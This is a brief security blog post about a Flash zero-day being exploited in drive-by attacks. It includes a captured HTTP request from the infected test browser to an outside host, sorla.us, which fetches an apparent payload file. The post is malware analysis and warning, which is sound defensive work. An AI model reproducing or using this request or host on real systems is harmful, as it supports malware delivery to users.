The new Flash 0-day has opened multiple avenues for malware authors. In my last article I showed how this vulnerability is being exploited via the PDF reader's support for SWF files. However, this vulnerability can just as easily be exploited in a standard drive-by fashion purely in Flash as well. This is precisely what has started to happen.
This exploit successfully worked on my VM under Firefox 3.5.1 and Flash player 10. It worked smoothly and just before FireFox crashed, I saw an outbound communication like this:
GET /images/x/xor.gif HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sorla.us Connection: Keep-Alive